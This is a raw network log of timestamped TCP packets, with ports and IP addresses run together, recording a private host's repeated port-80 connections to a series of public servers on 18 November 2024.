                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:07.458636045 CET805004113.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:07.458702087 CET5004180192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:07.709094048 CET5004380192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:07.713994026 CET805004334.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:07.715774059 CET5004380192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:07.716058016 CET5004380192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:07.717648029 CET5004380192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:07.720849991 CET805004334.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:07.722877979 CET805004334.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.553889036 CET805004334.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.555387020 CET5004380192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.560846090 CET805004334.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.560933113 CET5004380192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.567959070 CET805004247.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.568125963 CET5004280192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.573393106 CET805004247.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.573474884 CET5004280192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.581485033 CET5004480192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.586621046 CET805004413.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.586700916 CET5004480192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.586793900 CET5004480192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.586807013 CET5004480192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.591970921 CET805004413.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.591990948 CET805004413.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.842335939 CET5004580192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.847345114 CET805004547.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.847726107 CET5004580192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.847726107 CET5004580192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.847726107 CET5004580192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.852754116 CET805004547.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.852777004 CET805004547.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.031752110 CET805004413.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.061856985 CET5004480192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.068553925 CET805004413.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.069526911 CET5004480192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.219814062 CET5004680192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.224627972 CET805004644.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.224704981 CET5004680192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.290079117 CET5004680192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.290139914 CET5004680192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.294967890 CET805004644.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.294991970 CET805004644.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.326430082 CET805004547.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.347105980 CET5004580192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.352402925 CET805004547.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.352503061 CET5004580192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.886734962 CET805004644.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.903079033 CET5004680192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.908498049 CET805004644.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.908818007 CET5004680192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:11.021482944 CET5004780192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:11.026518106 CET805004718.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:11.026684999 CET5004780192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:11.026894093 CET5004780192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:11.026894093 CET5004780192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:11.032293081 CET805004718.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:11.032306910 CET805004718.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:11.105549097 CET5004880192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:11.110526085 CET805004813.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:11.110610008 CET5004880192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:11.110744953 CET5004880192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:11.110785961 CET5004880192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:11.115576029 CET805004813.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:11.115586996 CET805004813.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.476957083 CET805004718.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.478308916 CET5004780192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.483618975 CET805004718.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.485624075 CET5004780192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.494863033 CET5004980192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.500021935 CET8050049172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.501005888 CET5004980192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.501005888 CET5004980192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.501075983 CET5004980192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.506004095 CET8050049172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.506015062 CET8050049172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.558746099 CET805004813.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.559248924 CET5004880192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.564980030 CET805004813.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.565632105 CET5004880192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.964430094 CET5005080192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.969374895 CET805005034.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.969500065 CET5005080192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.969628096 CET5005080192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.969647884 CET5005080192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.974597931 CET805005034.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.974616051 CET805005034.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.153330088 CET8050049172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.156614065 CET5004980192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.156614065 CET5004980192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.158232927 CET5005180192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.161603928 CET8050049172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.163058996 CET8050051172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.163176060 CET5005180192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.184406996 CET5005180192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.184406996 CET5005180192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.189296961 CET8050051172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.189311028 CET8050051172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.826304913 CET8050051172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.826391935 CET5005180192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.826838970 CET805005034.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.850538969 CET5005180192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.851341009 CET5005080192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.855467081 CET8050051172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.856743097 CET805005034.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.857928991 CET5005080192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.864492893 CET5005280192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.869553089 CET805005234.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.869772911 CET5005280192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.869822979 CET5005280192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.869934082 CET5005280192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.874686956 CET805005234.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.874711990 CET805005234.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.119132996 CET5005380192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.124135017 CET80500533.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.125538111 CET5005380192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.125663042 CET5005380192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.125680923 CET5005380192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.130518913 CET80500533.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.130532026 CET80500533.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.799864054 CET80500533.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.800407887 CET5005380192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.805526018 CET80500533.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.805708885 CET5005380192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.841389894 CET805005234.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.841586113 CET5005280192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.846904039 CET805005234.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.847341061 CET5005280192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.883333921 CET5005480192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.888523102 CET805005418.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.888607025 CET5005480192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.888737917 CET5005480192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.888737917 CET5005480192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.893660069 CET805005418.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.893671989 CET805005418.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:15.040739059 CET5005580192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:15.045689106 CET805005518.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:15.047360897 CET5005580192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:15.047622919 CET5005580192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:15.047622919 CET5005580192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:15.052586079 CET805005518.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:15.052599907 CET805005518.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:15.579406023 CET805005418.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:15.579583883 CET5005480192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:15.584853888 CET805005418.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:15.584923029 CET5005480192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:15.594244003 CET5005680192.168.2.7208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:15.599129915 CET8050056208.100.26.245192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:15.599453926 CET5005680192.168.2.7208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:15.599620104 CET5005680192.168.2.7208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:15.599632978 CET5005680192.168.2.7208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:15.604470015 CET8050056208.100.26.245192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:15.604486942 CET8050056208.100.26.245192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:15.885859966 CET805005518.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:15.890723944 CET5005580192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:15.896521091 CET805005518.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:15.897416115 CET5005580192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.161892891 CET5005780192.168.2.73.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.166971922 CET80500573.254.94.185192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.167084932 CET5005780192.168.2.73.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.167325974 CET5005780192.168.2.73.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.167325974 CET5005780192.168.2.73.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.172326088 CET80500573.254.94.185192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.172342062 CET80500573.254.94.185192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.237180948 CET8050056208.100.26.245192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.238301992 CET5005680192.168.2.7208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.238301992 CET5005680192.168.2.7208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.243446112 CET8050056208.100.26.245192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.243458986 CET8050056208.100.26.245192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.383516073 CET8050056208.100.26.245192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.400278091 CET5005880192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.405160904 CET805005813.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.405853033 CET5005880192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.406208038 CET5005880192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.406408072 CET5005880192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.411066055 CET805005813.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.411174059 CET805005813.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.426765919 CET5005680192.168.2.7208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.123334885 CET80500573.254.94.185192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.123713017 CET5005780192.168.2.73.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.129060030 CET80500573.254.94.185192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.130862951 CET5005780192.168.2.73.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.369677067 CET5005980192.168.2.785.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.374588966 CET805005985.214.228.140192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.374789000 CET5005980192.168.2.785.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.374934912 CET5005980192.168.2.785.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.374960899 CET5005980192.168.2.785.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.379744053 CET805005985.214.228.140192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.379756927 CET805005985.214.228.140192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.837049961 CET805005813.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.837286949 CET5005880192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.842502117 CET805005813.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.842865944 CET5005880192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.849885941 CET5006080192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.854805946 CET805006044.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.854883909 CET5006080192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.854978085 CET5006080192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.854994059 CET5006080192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.859865904 CET805006044.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.859875917 CET805006044.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.254091024 CET805005985.214.228.140192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.301701069 CET5005980192.168.2.785.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.441463947 CET5005980192.168.2.785.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.441517115 CET5005980192.168.2.785.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.446448088 CET805005985.214.228.140192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.446463108 CET805005985.214.228.140192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.528311968 CET805006044.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.528546095 CET5006080192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.533870935 CET805006044.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.533957958 CET5006080192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.548698902 CET5006180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.553601027 CET805006154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.553879976 CET5006180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.553879976 CET5006180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.553910971 CET5006180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.558769941 CET805006154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.558820009 CET805006154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.705045938 CET805005985.214.228.140192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.754844904 CET5005980192.168.2.785.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.946144104 CET5006280192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.951189041 CET805006247.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.951334953 CET5006280192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.951535940 CET5006280192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.951535940 CET5006280192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.956368923 CET805006247.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.956379890 CET805006247.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:19.402029991 CET805006154.244.188.177192.168.2.7
